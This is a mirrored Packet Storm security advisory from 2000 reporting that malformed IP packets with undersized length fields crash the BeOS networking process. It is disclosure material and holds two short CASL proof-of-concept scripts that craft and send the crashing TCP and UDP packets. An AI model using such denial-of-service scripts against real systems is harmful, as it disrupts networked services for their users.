Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

beos.dos.txt

🗓️ 08 Apr 2000 00:00:00Reported by Tim NewshamType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 18 Views

BeOS networking crashes with malformed packets; bug reported, not fixed; restart possible.

Code
`Problem:  
It is possible to crash the BeOS networking process.  
  
Discussion:  
The BeOS networking stack crashes when certain malformed packets  
are sent to it. This document explains two such packets. The  
first is an IP packet with the protocol field set to TCP. If the  
IP length field is set to be shorter than 40, it will crash the  
networking process on reception. Similarly, an IP packet with  
protocol field set to UDP with an IP length of less than 28 also  
crashes the stack. The lengths 40 and 28 correspond with the  
minimum sizes of the IP and TCP headers, and the IP and UDP headers  
respectively.  
  
Because the networking stack is a seperate process in BeOS, it may  
be easily restarted after it crashes.  
  
A bug report has been filed with Be and assigned the bug number of  
20000405-18674. Be has marked the bug as "Will Not Fix" with the  
comment "The entire networking system will be replaced soon."  
  
This bug was found with the help of the ISIC utility by Mike Frantzen.  
  
Two CASL scripts which demonstrate the bug are listed below.  
  
References:  
http://www.be.com/ - Be's website. BeOS is available for download  
free of charge.  
  
http://bebugs.be.com/devbugs/ - Be's bug tracking database.  
  
http://expert.cc.purdue.edu/~frantzen/ - The homepage of the  
ISIC author.  
  
ftp://ftp.nai.com/pub/security/casl/ - NAI's packet scripting  
language CASL is available for download free of charge.  
  
Script 1:  
#!/usr/local/casl/bin/casl  
  
#include "tcpip.casl"  
#include "packets.casl"  
#include "tcp.casl"  
  
srchost = 10.0.0.1;  
dsthost = 10.0.0.2;  
  
IPH = copy UDPIP;  
  
IPH.ip_hl = 5;  
IPH.ip_src = srchost;  
IPH.ip_dst = dsthost;  
IPH.ip_length = 27;  
  
packet = [ IPH ];  
ip_output(packet);  
  
Script 2:  
#!/usr/local/casl/bin/casl  
  
#include "tcpip.casl"  
#include "packets.casl"  
#include "tcp.casl"  
  
srchost = 10.0.0.1;  
dsthost = 10.0.0.2;  
  
IPH = copy TCPIP;  
  
IPH.ip_hl = 5;  
IPH.ip_src = srchost;  
IPH.ip_dst = dsthost;  
IPH.ip_length = 39;  
  
packet = [ IPH ];  
ip_output(packet);  
  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
08 Apr 2000 00:00Current
7.4High risk
Vulners AI Score7.4
beos networking crashmalformed packetsip length issuesbug reportrestart capabilityisic utility
18